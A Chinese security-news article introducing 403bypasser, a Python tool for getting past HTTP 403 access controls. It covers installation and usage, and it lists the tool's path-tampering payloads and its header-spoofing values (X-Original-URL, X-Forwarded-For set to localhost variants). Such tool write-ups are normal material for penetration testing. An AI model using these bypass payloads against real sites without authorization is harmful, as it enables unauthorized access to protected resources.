freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用403bypasser绕过目标页面上的访问控制限制
2021-09-19 21:02:00

关于403bypasser

403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。403bypasser项目目前仍处于积极开发阶段,并且还会增加新的功能。

该工具基于Python语言开发,因此具备良好的跨平台特性。

工具安装

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/yunemse48/403bypasser.git

接下来,运行下列命令安装好该工具所需的依赖模块:

pip install -r requirements.txt

此时,403bypasser已完成安装。

工具参数

参数

描述

样例

Note

-u

single URL to scan

http://example.comor http://example.com/

指定目标页面的URL地址

-U

path to list of URLs

./urllist.txt, ../../urllist.txt等等

指定目标页面URL列表文件的地址

-d

single directory to scan

Admin 或/admin 或admin/ 或/admin/

指定需要扫描的目标目录

-D

path to list of directories

./dirlist.txt, ../../dirlist.txt等等

指定需要扫描的目标目录列表文件

工具使用

使用样例1

python3 403bypasser.py -u https://example.com -d /secret

使用样例2

python3 403bypasser.py -u https://example.com -D dirlist.txt

使用样例3

python3 403bypasser.py -U urllist.txt -d /secret

使用样例4

python3 403bypasser.py -U urllist.txt -D dirlist.txt

注意事项:下面给出的例子中,不同斜杠使用的结果都是一样的,你可以选择自己喜欢的方式:

python3 403bypasser.py -u https://example.com -d secret

python3 403bypasser.py -u https://example.com -d /secret

python3 403bypasser.py -u https://example.com -d /secret/

python3 403bypasser.py -u https://example.com -d secret/

python3 403bypasser.py -u https://example.com/ -d secret

该工具支持的功能

请求方法篡改

将GET请求转换为POST请求

路径篡改

/%2e/secret

/secret/

/secret..;/

/secret/..;/

/secret%20

/secret%09

/secret%00

/secret.json

/secret.css

/secret.html

/secret?

/secret??

/secret???

/secret?testparam

/secret#

/secret#test

/secret/.

//secret//

/./secret/./

通过非标准Header重写目标URL

X-Original-URL: /secret

X-Rewrite-URL: /secret

其他Header&值

Header:

X-Custom-IP-Authorization

X-Forwarded-For

X-Forward-For

X-Remote-IP

X-Originating-IP

X-Remote-Addr

X-Client-IP

X-Real-IP

值:

localhost

localhost:80

localhost:443

127.0.0.1

127.0.0.1:80

127.0.0.1:443

2130706433

0x7F000001

0177.0000.0000.0001

0

127.1

10.0.0.0

10.0.0.1

172.16.0.0

172.16.0.1

192.168.1.0

192.168.1.1

工具运行截图

项目地址

403bypasser:GitHub传送门

# 访问限制绕过
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录